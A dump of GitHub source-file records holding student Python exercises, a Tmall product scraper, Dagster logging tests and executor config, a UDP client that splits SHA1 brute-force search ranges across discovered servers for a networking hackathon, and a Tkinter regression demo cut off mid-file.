letters o and p between\n consecutive characters. If the first letter is a capital\n the o is capitalized, if not the o is lower case. If\n the second letter is capitalized the p is capitalized,\n if not the p is lower case.\n \"\"\"\n oped = \"\"\n num = 1\n if len(s) > 1:\n for ch in s:\n if ch in \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\":\n if num > 1:\n if s[num-2].isalpha():\n oped += \"P\" + ch\n else:\n oped += ch\n if num != len(s) and s[num].isalpha():\n oped += \"O\"\n elif s[num].isalpha():\n oped += ch + \"O\"\n else:\n oped += ch\n elif ch in \"abcdefghijklmnopqrstuvwxyz\":\n if num > 1:\n if s[num-2].isalpha():\n oped += \"p\" + ch\n else:\n oped += ch\n if num != len(s) and s[num].isalpha():\n oped += \"o\"\n elif s[num].isalpha():\n oped += ch + \"o\"\n else:\n oped += ch\n else:\n oped += ch\n num += 1\n else:\n oped = s\n return oped\n\n########################\n# Question 10\n########################\ndef nonrepetitive(s):\n \"\"\"(str) -> bool\n Preconditions: s does not contain spaces.\n Returns whether or not any substring in s repeats consecutively.\n \"\"\"\n length = len(s)\n state = True\n for i in range(length):\n for j in range(i,length):\n s1 = s[i:j].strip()\n s2 = s[j:2*j - i].strip()\n if s1 == s2 and s1 != \"\" != s2:\n state = False\n \n return state\n","repo_name":"SahilTara/ITI1120","sub_path":"ASSIGNMENTS/Assignment 2/a2_300018569/a2_part2_300018569.py","file_name":"a2_part2_300018569.py","file_ext":"py","file_size_in_byte":5740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38184207066","text":"# -*- coding:utf-8 -*- #\r\n'''\r\nCreated on 2017-1-7\r\n@author: Leo\r\n'''\r\nimport re\r\nimport numpy as np\r\nimport urllib.request as ur\r\nimport urllib\r\nfrom lxml import etree\r\nfrom mongodb_writer import insert_into_mongodb\r\n\r\n\r\nclass Tmall_product:\r\n def get_page(self, page, product_name):\r\n page = ur.urlopen(\"https://list.tmall.com/search_product.htm?s=\" + str(page) + \"&q=\" + product_name + \"&sort=s&style=g&type=pc#J_Filter\")\r\n html = page.read().decode('GBK')\r\n page = re.findall(\"(?<=共)(.*?)(?=页)\", html)[0]\r\n return page\r\n\r\n def parser(self, page, product_name):\r\n data_list = []\r\n try:\r\n URL = \"https://list.tmall.com/search_product.htm?s=\" + str(page) + \"&q=\" + product_name + \"&sort=s&style=g&type=pc#J_Filter\"\r\n print(URL)\r\n page = ur.urlopen(URL)\r\n html = page.read().decode('GBK')\r\n selector = etree.HTML(html)\r\n except Exception as err:\r\n print(err)\r\n \r\n link_name = selector.xpath('//div[@class=\"productTitle productTitle-spu\"]/a[1]/@title')\r\n data_list.append(link_name)\r\n \r\n link = selector.xpath('//div[@class=\"productTitle productTitle-spu\"]/a[1]/@href')\r\n data_list.append(link)\r\n \r\n insert_into_mongodb(data_list, \"TmallProduct\")\r\n\r\n def controller(self):\r\n data = urllib.parse.quote(\"耳机\", encoding = \"GBK\")\r\n page = self.get_page(page=0, product_name=data)\r\n page_list = np.arange(0, 60*int(page), 60).tolist()\r\n for page in page_list:\r\n self.parser(page=page, product_name=data)\r\n #self.parser(0, data)\r\n\r\nTmall = Tmall_product()\r\nTmall.controller()\r\n","repo_name":"sunhailin-Leo/TaoBao_Tmall_Spider","sub_path":"Tmall/Tmall_product.py","file_name":"Tmall_product.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6461284482","text":"# 4 Найти максимальное из трех чисел\n\nfrom random import randint \nlist = [randint(1,100) for i in range(3)]\nprint(list)\n\n# max=list[0]\n\ndef max_from_three (x,y,z):\n max = x\n for i in range(1,3):\n if list[i]>max: max=list[i]\n return max\n\nmax_from_three(list[0], list[1], list[2])\nprint (max)\n\n# for i in range(1,3):\n# if list[i]>max: max=list[i]\n\n# print (f'максимальное число - {max}')\n\n# # def GetRandom(): \n# # return l=randint(0,100)\n# list=[]\n# for i in range (3):\n# list=randint(0, 10)\n# print (list)\n\n# print (list)\n\n# # def PrintArray (array):\n# # while i<3: print (A[i])\n\n\n# # for i in range (1,n+1):\n\n# # F=F*\n\n# # int i=0; //лучше делать через for так не будет проблем с реопредлением i\n\n# # i=0;\n\n\n# # int max=0;\n# # int[] A = new int [3];\n\n# # while (i<3)\n\n# # {\n\n# # A[i]=GetRandom();\n\n# # i++;\n\n","repo_name":"vlasek/python_1","sub_path":"seminar1/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9890819237","text":"import logging\nfrom contextlib import contextmanager\n\nimport pytest\nfrom dagster._utils.log import define_structured_logger\nfrom dagster._utils.test import create_test_pipeline_execution_context\n\n\n@contextmanager\ndef construct_structured_logger(constructor=lambda x: x):\n messages = []\n\n def _append_message(logger_message):\n messages.append(constructor(logger_message))\n\n logger_def = define_structured_logger(\"some_name\", _append_message, level=logging.DEBUG)\n yield logger_def, messages\n\n\ndef test_structured_logger_in_context():\n with construct_structured_logger() as (logger, messages):\n context = create_test_pipeline_execution_context(logger_defs={\"structured_log\": logger})\n context.log.debug(\"from_context\", extra={\"foo\": 2})\n assert len(messages) == 1\n message = messages[0]\n assert message.name == \"some_name\"\n assert message.level == logging.DEBUG\n assert message.record.__dict__[\"foo\"] == 2\n assert message.meta[\"orig_message\"] == \"from_context\"\n\n\ndef test_structured_logger_in_context_with_bad_log_level():\n messages = []\n\n def _append_message(logger_message):\n messages.append(logger_message)\n\n logger = define_structured_logger(\"some_name\", _append_message, level=logging.DEBUG)\n context = create_test_pipeline_execution_context(logger_defs={\"structured_logger\": logger})\n with pytest.raises(AttributeError):\n context.log.gargle(\"from_context\")\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster/dagster_tests/general_tests/utils_tests/log_tests/test_structured_logging.py","file_name":"test_structured_logging.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"3374945259","text":"from collections import Counter\nfrom itertools import chain\n\nfrom entity_network.clean_text import comparison_rules\nfrom entity_network import parse_components\n\ndef main(values, category):\n\n # apply category specific or general component parser\n if category=='address':\n parsed = parse_components.address(values[category])\n elif category=='phone':\n parsed = parse_components.phone(values[category])\n else:\n delimiter = comparison_rules[category]['comparer']\n parsed = parse_components.common(values[category], delimiter=delimiter)\n\n # alias names for later merges that include multiple categories\n alias = {'parsed': f'{category}_normalized', 'components': f'{category}_difference'}\n\n # include source column descriptions if provided\n plan = {'parsed': list, 'components': list}\n list_unique_notna = lambda x: list(x.drop_duplicates().dropna())\n if 'df2_column' in values:\n parsed['df2_column'] = values['df2_column']\n plan = {**{'df2_column': list_unique_notna}, **plan}\n alias = {**{'df2_column': f'df2_column_{category}'}, **alias}\n if 'df_column' in values:\n parsed['df_column'] = values['df_column']\n plan = {**{'df_column': list_unique_notna}, **plan}\n alias = {**{'df_column': f'df_column_{category}'}, **alias}\n\n # group components by id\n summary = parsed.groupby(values.index.name)\n summary = summary.agg(plan)\n\n # calculate the difference in components\n summary['components'] = summary['components'].apply(_term_diff)\n\n # rename columns to reflect category for later merging and after difference is found\n summary = summary.rename(columns=alias)\n\n return summary\n\ndef _term_diff(values):\n\n if values[0] is None or values[1] is None:\n return None\n\n frequency = Counter(chain(*values))\n difference = ['='.join(key) for key,val in frequency.items() if val==1 and key[1] is not None]\n\n return difference","repo_name":"jwcook23/entity_network","sub_path":"entity_network/_find_difference.py","file_name":"_find_difference.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9891897927","text":"from dagster import Field, Float, Noneable, StringSource\nfrom dagster._core.host_representation import IN_PROCESS_NAME\nfrom dagster._utils.merger import merge_dicts\nfrom dagster_celery.executor import CELERY_CONFIG\nfrom dagster_k8s import DagsterK8sJobConfig\nfrom dagster_k8s.client import DEFAULT_WAIT_TIMEOUT\n\nCELERY_K8S_CONFIG_KEY = \"celery-k8s\"\n\n\ndef celery_k8s_executor_config():\n # DagsterK8sJobConfig provides config schema for specifying Dagster K8s Jobs\n job_config = DagsterK8sJobConfig.config_type_job()\n\n additional_config = {\n \"load_incluster_config\": Field(\n bool,\n is_required=False,\n default_value=True,\n description=\"\"\"Set this value if you are running the launcher within a k8s cluster. If\n ``True``, we assume the launcher is running within the target cluster and load config\n using ``kubernetes.config.load_incluster_config``. Otherwise, we will use the k8s config\n specified in ``kubeconfig_file`` (using ``kubernetes.config.load_kube_config``) or fall\n back to the default kubeconfig. Default: ``True``.\"\"\",\n ),\n \"kubeconfig_file\": Field(\n Noneable(str),\n is_required=False,\n description=\"Path to a kubeconfig file to use, if not using default kubeconfig.\",\n ),\n \"job_namespace\": Field(\n StringSource,\n is_required=False,\n description=(\n \"The namespace into which to launch new jobs. Note that any \"\n \"other Kubernetes resources the Job requires (such as the service account) must be \"\n 'present in this namespace. Default: ``\"default\"``'\n ),\n ),\n \"repo_location_name\": Field(\n StringSource,\n is_required=False,\n default_value=IN_PROCESS_NAME,\n description=\"The repository location name to use for execution.\",\n ),\n \"job_wait_timeout\": Field(\n Float,\n is_required=False,\n default_value=DEFAULT_WAIT_TIMEOUT,\n description=(\n \"Wait this many seconds for a job to complete before marking the run as failed.\"\n f\" Defaults to {DEFAULT_WAIT_TIMEOUT} seconds.\"\n ),\n ),\n }\n\n cfg = merge_dicts(CELERY_CONFIG, job_config)\n cfg = merge_dicts(cfg, additional_config)\n return cfg\n\n\ndef get_celery_engine_config(image_pull_policy=None, additional_env_config_maps=None):\n job_config = get_celery_engine_job_config(image_pull_policy, additional_env_config_maps)\n return {\"execution\": {CELERY_K8S_CONFIG_KEY: {\"config\": job_config[\"execution\"][\"config\"]}}}\n\n\ndef get_celery_engine_job_config(image_pull_policy=None, additional_env_config_maps=None):\n return {\n \"execution\": {\n \"config\": merge_dicts(\n {\n \"job_namespace\": {\"env\": \"DAGSTER_K8S_PIPELINE_RUN_NAMESPACE\"},\n \"env_config_maps\": [\n {\"env\": \"DAGSTER_K8S_PIPELINE_RUN_ENV_CONFIGMAP\"},\n ]\n + (additional_env_config_maps if additional_env_config_maps else []),\n },\n (\n {\n \"image_pull_policy\": image_pull_policy,\n }\n if image_pull_policy\n else {}\n ),\n )\n }\n }\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/libraries/dagster-celery-k8s/dagster_celery_k8s/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"589673529","text":"import socket\nimport string_utils\nimport math\nimport encoder_decoder\nimport message\nimport itertools as it\nimport time\n\n# client configuration #\n\nBROADCAST = \"255.255.255.255\"\nSERVER_PORT = 3117\nTEAM_NAME = ';Drop table students; --'\nOFFER_TIMEOUT = 1\nACK_TIMEOUT = 30\nNUM_OF_LETTERS = 26\nWORKERS = []\n\nclient_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nenc_dec = encoder_decoder.Encoder_decoder()\n\n\n\ndef main():\n hashed_string = input('Welcome to ' + TEAM_NAME + '.' + ' Please enter the hash:\\n')\n if not_valid(hashed_string):\n return\n str_length = input('Please enter the input string length:\\n')\n str_length = int(str_length)\n send_discover()\n wait_for_offers()\n jobs = create_jobs(str_length, len(WORKERS))\n send_requests(WORKERS, jobs, hashed_string)\n ans = wait_for_ack()\n print('The input string is ' + ans)\n\n\ndef send_requests(workers, jobs, hashed_string):\n i = 0\n for worker in workers:\n send_request(worker, jobs[i], hashed_string)\n i = i + 1\n\n\ndef send_request(worker, job, hashed_string):\n length = len(job[0])\n req_msg = message.Message(TEAM_NAME, message.REQUEST, hashed_string, length, job[0], job[1])\n encoded_msg = enc_dec.encode(req_msg)\n client_sock.sendto(encoded_msg, (worker[0], SERVER_PORT))\n\n\ndef send_discover():\n discover_msg = message.Message(TEAM_NAME, message.DISCOVER, \"\", 1, \"\", \"\")\n encoded = enc_dec.encode(discover_msg)\n client_sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\n client_sock.sendto(encoded, (BROADCAST, SERVER_PORT))\n\n\ndef wait_for_offers():\n client_sock.settimeout(OFFER_TIMEOUT)\n try:\n while 1:\n (message, server_address) = client_sock.recvfrom(2048)\n WORKERS.append(server_address)\n except socket.timeout:\n return\n\n\ndef split_to_chunks(lst, each):\n return list(it.zip_longest(*[iter(lst)] * each))\n\n\ndef divide(length, num_servers):\n start = 'a' * length\n end = 'z' * length\n search_space = string_utils.Ranger(start, end)\n num_strings = NUM_OF_LETTERS ** length\n strings = search_space.generate_all_from_to_of_len()\n each = math.ceil(num_strings / num_servers)\n chunks = split_to_chunks(strings,each)\n return chunks\n\n\ndef create_jobs(length, num_servers):\n jobs = []\n chunks = string_utils.split_fairly(length,num_servers)\n for chunk in chunks:\n jobs.append((chunk[0], chunk[-1]))\n return jobs\n\n\ndef not_valid(hashed_string):\n length = len(hashed_string)\n if length != 40:\n print('Input string must be of length 40.')\n return True\n try:\n sha_int = int(hashed_string, 16)\n except ValueError:\n print('Input string must be sh1 hash.')\n return True\n return False\n\n\ndef wait_for_ack():\n start_time = time.time()\n client_sock.settimeout(None)\n while 1:\n if time.time() - start_time > ACK_TIMEOUT:\n return '[ACK timeout!]'\n (msg, server_address) = client_sock.recvfrom(2048)\n decoded_msg = enc_dec.decode(msg)\n if decoded_msg.type == message.ACK:\n return decoded_msg.start\n elif decoded_msg.type == message.NACK:\n WORKERS.remove(server_address)\n\n if len(WORKERS) == 0: # all servers returned NACK\n return 'not found!'\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"chendoy/intro-to-nets-hackaton","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70850428647","text":"from BaseApp import BaseApp\nimport tkinter as tk\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.stats as stats\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import KBinsDiscretizer\nfrom sklearn.neighbors import KNeighborsRegressor\n\ndef true_funct(x):\n\treturn np.sin(x)\n\ndef sample_data(N,stddevX,stddevY):\n\tx = stats.norm(loc=0,scale=stddevX).rvs(N)\n\ty = true_funct(x) + stats.norm(scale=stddevY).rvs(N)\n\treturn x, y\n\ndef get_contour_data(stddevX,stddevY):\n\tnx, ny = (100, 100)\n\tx = np.linspace(-6, 6, nx)\n\ty = np.linspace(-1.8, 1.8, ny)\n\tXg, Yg = np.meshgrid(x, y)\n\tXg = Xg.T\n\tYg = Yg.T\n\tZ = np.empty((nx, ny))\n\tfor i, xx in enumerate(x):\n\t\tZ[i, :] = stats.norm.pdf(y, loc=true_funct(xx), scale=stddevY)\n\tfor i, yy in enumerate(y):\n\t\tZ[:, i] *= stats.norm.pdf(x, loc=0, scale=stddevX)\n\tZ /= sum(sum(Z))\n\treturn Xg, Yg, Z\n\nclass MetaModel:\n\n\tdef eval_perf(self,param, D):\n\t\tif D is None:\n\t\t\treturn np.nan, np.nan, np.nan, np.nan\n\t\tX, Y = D\n\t\tif len(Y)==0:\n\t\t\treturn np.nan, np.nan, np.nan, np.nan\n\t\telse:\n\t\t\tYhat = self.predict(param, X)\n\t\t\tybar = np.mean(Y)\n\t\t\tmse = np.mean((Y-Yhat)**2)\n\t\t\tmae = np.mean(np.abs(Y-Yhat))\n\t\t\tmape = np.mean(np.abs(Y-Yhat)/np.abs(Y))\n\t\t\tR2 = 1 - mse / np.mean((Y-ybar)**2)\n\t\t\treturn mse, mae, mape, R2\n\n\t\t\n\tdef __init__(self,param_space,Dtrain,Dtest):\n\n\t\t# parameter range\n\t\tself.param_space = param_space\n\n\t\t# sweep parameter space\n\t\tXtrain,Ytrain = Dtrain\n\t\tXtrain = Xtrain.reshape(-1, 1)\n\t\tself.modeldict = dict()\n\t\tfor param in self.param_space:\n\t\t\tself.modeldict[param] = self.train_one(param,Xtrain,Ytrain)\n\n\t\t# compute test and train performance\n\t\tself.train_perf = np.array([self.eval_perf(param,Dtrain) for param in self.param_space])\n\t\tself.test_perf = np.array([self.eval_perf(param,Dtest) for param in self.param_space])\n\n\tdef predict(self, param, X): pass\n\tdef train_one(self,param,Xtrain,Ytrain): pass\n\n\tdef update_test_perf(self,Dtest):\n\t\tself.test_perf = np.array([self.eval_perf(param,Dtest) for param in self.param_space])\n\nclass MetaLinearRegression(MetaModel):\n\n\tdef train_one(self,param,Xtrain,Ytrain):\n\t\tq = param\n\t\tpoly = PolynomialFeatures(q, include_bias=False).fit(Xtrain)\n\t\tphi_train = poly.transform(Xtrain)\n\t\tmodel = LinearRegression().fit(phi_train, Ytrain)\n\t\treturn {'poly': poly, 'model': model}\n\n\tdef predict(self,param,X):\n\t\tmodel = self.modeldict[param]\n\t\tpoly = model['poly']\n\t\tlr = model['model']\n\t\treturn lr.predict(poly.fit_transform(X.reshape(-1, 1)))\n\nclass MetaKBins(MetaModel):\n\n\tdef train_one(self,param,Xtrain,Ytrain):\n\t\tn_bins = param\n\t\tenc = KBinsDiscretizer(n_bins=n_bins,encode='ordinal',subsample=200_000,strategy='quantile')\n\t\tX_binned = enc.fit_transform(Xtrain.reshape(-1, 1))\n\t\tybin = np.empty(n_bins)\n\t\tfor i in range(n_bins):\n\t\t\tind = i==X_binned[:, 0]\n\t\t\tif not np.any(ind):\n\t\t\t\tybin[i] = np.nan\n\t\t\telse:\n\t\t\t\tybin[i] = np.mean(Ytrain[ind])\n\t\treturn {'enc':enc,'ybin':ybin}\n\n\tdef predict(self,param,X):\n\t\tmodel = self.modeldict[param]\n\t\tenc = model['enc']\n\t\tybin = model['ybin']\n\t\treturn np.array([ybin[int(i)] for i in enc.transform(X.reshape(-1, 1))[:, 0]])\n\nclass MetaKNN(MetaModel):\n\n\tdef train_one(self,param,Xtrain,Ytrain):\n\t\tn_neighbors = param\n\t\tmodel = KNeighborsRegressor(n_neighbors=n_neighbors) \\\n\t\t\t.fit(Xtrain.reshape(-1, 1), Ytrain)\n\t\treturn {'model': model}\n\n\tdef predict(self,param,X):\n\t\tmodel = self.modeldict[param]\n\t\tknn = model['model']\n\t\treturn knn.predict(X.reshape(-1, 1))\n\nclass TkContainer(BaseApp):\n\n\tmetamodel_names = ['K-bins','KNN','Linear regression']\n\tmetamodel_info = {\n\t\t'K-bins':{\n\t\t\t'param':'# of bins K',\n\t\t\t'param_space':np.arange(2, 10)\n\t\t},\n\t\t'KNN':{\n\t\t\t'param':'# of neighbors K',\n\t\t\t'param_space':np.arange(2, 10)\n\t\t},\n\t\t'Linear regression':{\n\t\t\t'param':'polynomial order',\n\t\t\t'param_space': np.arange(1, 8)\n\t\t}\n\t}\n\ttrain_plt = None\n\ttest_plt = None\n\n\tdef __init__(self):\n\t\tsuper(TkContainer, self).__init__(\n\t\t\ttitle=\"Supervised learning demo\",\n\t\t\tgeometry=\"1400x800\",\n\t\t\tfigsize=(12, 4),\n\t\t\tsubplots=(2,1))\n\n\tdef initialize_parameters(self):\n\n\t\tself.stddevX = tk.DoubleVar(master=self.root, value=2)\n\t\tself.stddevXstr = tk.StringVar(master=self.root, value='2.0')\n\n\t\tself.stddevY = tk.DoubleVar(master=self.root, value=0.3)\n\t\tself.stddevYstr = tk.StringVar(master=self.root, value='0.3')\n\n\t\tself.Ntrain = tk.IntVar(master=self.root, value=0)\n\t\tself.Ntrainstr = tk.StringVar(master=self.root, value='0')\n\n\t\tself.Ntest = tk.IntVar(master=self.root, value=0)\n\t\tself.Nteststr = tk.StringVar(master=self.root, value='0')\n\n\t\tself.param = tk.IntVar(master=self.root, value=2)\n\t\tself.paramstr = tk.StringVar(master=self.root, value='2')\n\n\t\tself.show_pXY = tk.BooleanVar(master=self.root, value=False)\n\t\tself.show_function = tk.BooleanVar(master=self.root, value=False)\n\t\tself.show_model = tk.BooleanVar(master=self.root, value=False)\n\t\tself.show_sweep = tk.BooleanVar(master=self.root, value=False)\n\n\t\tself.selected_model = tk.StringVar(master=self.root, value='K-bins')\n\n\tdef initialize_data(self):\n\t\tself.Dtrain= sample_data(self.Ntrain.get(),self.stddevX.get(),self.stddevY.get())\n\t\tself.Dtest = sample_data(self.Ntest.get(),self.stddevX.get(),self.stddevY.get())\n\t\tself.build_model()\n\n\tdef add_widgets(self):\n\n\t\theader_width = 40\n\n\t\t# xy checkbox ........................................\n\t\tself.get_checkbox(self.root, text='Show XY distribution',variable=self.show_pXY, command=self.click_pXY_checkbox)\\\n\t\t\t.pack(side=tk.TOP, fill=tk.X)\n\n\t\t# function checkbox ........................................\n\t\tself.get_checkbox(self.root, text='Show true function',variable=self.show_function, command=self.click_function_checkbox)\\\n\t\t\t.pack(side=tk.TOP, fill=tk.X)\n\n\t\t# stddev X input box ......................................\n\t\tself.get_entry_label(self.root,\n\t\t\t\t\t\ttext=\"stddev X\",\n\t\t\t\t\t\ttextvariable=self.stddevXstr,\n\t\t\t\t\t\tvalidatecommand=self.set_stddevX)\\\n\t\t\t.pack(side=tk.TOP, fill=tk.X)\n\n\t\t# stddev Y input box ......................................\n\t\tself.get_entry_label(self.root,\n\t\t\t\t\t\ttext=\"stddev Y\",\n\t\t\t\t\t\ttextvariable=self.stddevYstr,\n\t\t\t\t\t\tvalidatecommand=self.set_stddevY)\\\n\t\t\t.pack(side=tk.TOP, fill=tk.X)\n\n\t\t# Header data ------------------------------------------\n\t\tself.get_header(self.root,text='Training data',char='.',width=header_width)\\\n\t\t\t.pack(side=tk.TOP, fill=tk.X)\n\n\t\t# N train input box ......................................\n\t\tself.get_entry_label(self.root,\n\t\t\t\t\t\ttext=\"N train\",\n\t\t\t\t\t\ttextvariable=self.Ntrainstr,\n\t\t\t\t\t\tvalidatecommand=self.set_Ntrain)\\\n\t\t\t.pack(side=tk.TOP, fill=tk.X)\n\n\t\t# resample train button ......................................\n\t\tself.get_button(self.root,text=\"Resample train\",command=self.press_resample_train)\\\n\t\t\t.pack(side=tk.TOP, fill=tk.X)\n\n\t\t# Header Model ----------------------------------------\n\t\tself.get_header(self.root,'Model',char='.',width=header_width)\\\n\t\t\t.pack(side=tk.TOP, fill=tk.X)\n\n\t\t# model checkbox ........................................\n\t\tself.get_checkbox(self.root, text='Show model',variable=self.show_model, command=self.click_model_checkbox)\\\n\t\t\t.pack(side=tk.TOP, fill=tk.X)\n\n\t\t# select model combo box ........................................\n\t\tself.get_combobox(self.root,\n\t\t\t\t\t\t \ttext='Model type',\n\t\t\t\t\t\t\ttextvariable = self.selected_model,\n\t\t\t\t\t\t\tvalues = self.metamodel_names,\n\t\t\t\t\t\t\tcommand = self.select_model_type)\\\n\t\t\t.pack(side=tk.TOP, fill=tk.X)\n\n\t\t# parmaeter input box ......................................\n\t\tselected_model = self.selected_model.get()\n\t\tmetamodel_info = self.metamodel_info[selected_model]\n\n\t\tself.param_input = self.get_combobox(self.root,\n\t\t\t\t\t\t text= metamodel_info['param'],\n\t\t\t\t\t\t textvariable=self.paramstr,\n\t\t\t\t\t\t values=list(metamodel_info['param_space']),\n\t\t\t\t\t\t command=self.select_model_param)\n\t\tself.param_input.pack(side=tk.TOP, fill=tk.X)\n\n\t\t# Header test data ----------------------------------------\n\t\tself.get_header(self.root,'Test data',char='.',width=header_width)\\\n\t\t\t.pack(side=tk.TOP, fill=tk.X)\n\n\t\t# N test input box ......................................\n\t\tself.get_entry_label(self.root,\n\t\t\t\t\t\ttext=\"N test\",\n\t\t\t\t\t\ttextvariable=self.Nteststr,\n\t\t\t\t\t\tvalidatecommand=self.set_Ntest)\\\n\t\t\t.pack(side=tk.TOP, fill=tk.X)\n\n\t\t# resample test button ......................................\n\t\tself.get_button(self.root,text=\"Resample test\",command=self.press_resample_test)\\\n\t\t\t.pack(side=tk.TOP, fill=tk.X)\n\n\t\t# Header sweep ------------------------------------------\n\t\tself.get_header(self.root,text='Parameter sweep',char='.',width=header_width)\\\n\t\t\t.pack(side=tk.TOP, fill=tk.X)\n\n\t\t# sweep plot checkbox ........................................\n\t\tself.get_checkbox(self.root, text='Show parameter sweep',variable=self.show_sweep,\n\t\t\t\t\t\t command=self.click_sweep_checkbox)\\\n\t\t\t.pack(side=tk.TOP, fill=tk.X)\n\n\tdef initialize_fig(self):\n\n\t\tax0 = self.ax[0]\n\n\t\t# pXY contour ....................................\n\t\tXg, Yg, Z, = get_contour_data(self.stddevX.get(), self.stddevY.get())\n\t\tself.plt_pXY = ax0.contour(Xg, Yg, Z)\n\t\tself.plt_pXY.set_alpha(0.0)\n\n\t\t# Data ....................................\n\t\tself.plt_train, = ax0.plot(self.Dtrain[0],self.Dtrain[1],'o',c='k',markersize=12)\n\t\tself.plt_test, = ax0.plot(self.Dtest[0],self.Dtest[1],'+',c='r',markeredgewidth=4,markersize=20)\n\n\t\t# True function ....................................\n\t\tself.xx = np.linspace(-6, 6,200)\n\t\tself.plt_truefunc, = ax0.plot(self.xx, true_funct(self.xx), c='r', linewidth=6)\n\t\tself.plt_truefunc.set_visible(self.show_function.get())\n\n\t\t# Model ....................................\n\t\tself.plt_model, = ax0.plot(self.xx, self.eval_model(self.xx), c='m', linewidth=6)\n\t\tself.plt_model.set_visible(self.show_model.get())\n\n\t\tax0.set_ylim(-2,2)\n\t\tax0.spines['right'].set_visible(False)\n\t\tax0.spines['left'].set_visible(False)\n\t\tax0.spines['bottom'].set_visible(False)\n\t\tax0.spines['top'].set_visible(False)\n\t\tax0.set_xticks([0])\n\t\tax0.set_yticks([0])\n\t\tax0.grid(linestyle='-',linewidth=2)\n\n\t\tself.txt = ax0.text(1, .1, self.format_string(),\n\t\t\thorizontalalignment='right',\n\t\t\tverticalalignment='center',\n\t\t\ttransform=ax0.transAxes,\n\t\t\tfontsize=30)\n\t\tself.txt.set_visible(self.show_model.get())\n\n\t\tax0.text(1, 0.5, 'x',\n\t\t\thorizontalalignment='right',\n\t\t\tverticalalignment='bottom',\n\t\t\ttransform=ax0.transAxes,\n\t\t\tfontsize=40)\n\n\t\tax0.text(0.48, 1, 'y',\n\t\t\thorizontalalignment='right',\n\t\t\tverticalalignment='top',\n\t\t\ttransform=ax0.transAxes,\n\t\t\tfontsize=40)\n\n\t\t# Sweep plot .........................................\n\t\tself.make_sweep_plot(self.ax[1])\n\t\tself.ax[1].set_visible(self.show_sweep.get())\n\n\tdef update_figure(self,replotpXY=False):\n\n\t\tif (self.plt_pXY is not None) and replotpXY:\n\t\t\tfor coll in self.plt_pXY.collections:\n\t\t\t\tcoll.remove()\n\t\t\tXg, Yg, Z, = get_contour_data(self.stddevX.get(), self.stddevY.get())\n\t\t\tself.plt_pXY = self.ax[0].contour(Xg, Yg, Z)\n\t\t\tif self.show_pXY.get():\n\t\t\t\tself.plt_pXY.set_alpha(1.0)\n\t\t\telse:\n\t\t\t\tself.plt_pXY.set_alpha(0.0)\n\n\t\tif self.plt_model is not None:\n\t\t\tself.plt_model.set_ydata(self.eval_model(self.xx))\n\n\t\tif self.plt_train is not None:\n\t\t\tself.plt_train.set_xdata(self.Dtrain[0])\n\t\t\tself.plt_train.set_ydata(self.Dtrain[1])\n\n\t\tif self.plt_test is not None:\n\t\t\tself.plt_test.set_xdata(self.Dtest[0])\n\t\t\tself.plt_test.set_ydata(self.Dtest[1])\n\n\t\tif self.txt is not None:\n\t\t\tself.txt.set_text(self.format_string())\n\n\t\tif self.train_plt is not None:\n\t\t\tself.train_plt.remove()\n\t\t\tself.test_plt.remove()\n\t\t\tself.make_sweep_plot(self.ax[1])\n\t\t\tself.ax[1].set_visible(self.show_sweep.get())\n\n\t\tplt.draw()\n\n\tdef set_stddevX(self):\n\t\ttry:\n\t\t\tself.stddevX.set(float(self.stddevXstr.get()))\n\t\t\tself.press_both_resample(replotpXY=True)\n\t\t\treturn True\n\t\texcept ValueError:\n\t\t\treturn\n\n\tdef set_stddevY(self):\n\t\ttry:\n\t\t\tself.stddevY.set(float(self.stddevYstr.get()))\n\t\t\tself.press_both_resample(replotpXY=True)\n\t\t\treturn True\n\t\texcept ValueError:\n\t\t\treturn\n\n\tdef set_Ntrain(self):\n\t\ttry:\n\t\t\tself.Ntrain.set(int(self.Ntrainstr.get()))\n\t\t\tself.press_resample_train()\n\t\t\treturn True\n\t\texcept ValueError:\n\t\t\treturn False\n\n\tdef set_Ntest(self):\n\t\ttry:\n\t\t\tself.Ntest.set(int(self.Nteststr.get()))\n\t\t\tself.press_resample_test()\n\t\t\treturn True\n\t\texcept ValueError:\n\t\t\treturn False\n\n\tdef press_resample_train(self):\n\t\tself.Dtrain = sample_data(self.Ntrain.get(),self.stddevX.get(), self.stddevY.get())\n\t\tself.build_model()\n\t\tself.update_figure()\n\n\tdef press_resample_test(self):\n\t\tself.Dtest = sample_data(self.Ntest.get(),self.stddevX.get(), self.stddevY.get())\n\t\tself.metamodel.update_test_perf(self.Dtest)\n\t\tself.update_figure()\n\n\tdef press_both_resample(self,replotpXY=False):\n\t\tself.Dtrain = sample_data(self.Ntrain.get(), self.stddevX.get(), self.stddevY.get())\n\t\tself.Dtest = sample_data(self.Ntest.get(), self.stddevX.get(), self.stddevY.get())\n\t\tself.build_model()\n\t\tself.update_figure(replotpXY)\n\n\tdef click_pXY_checkbox(self):\n\t\tif self.show_pXY.get():\n\t\t\tself.plt_pXY.set_alpha(1.0)\n\t\telse:\n\t\t\tself.plt_pXY.set_alpha(0.0)\n\t\tplt.draw()\n\n\tdef 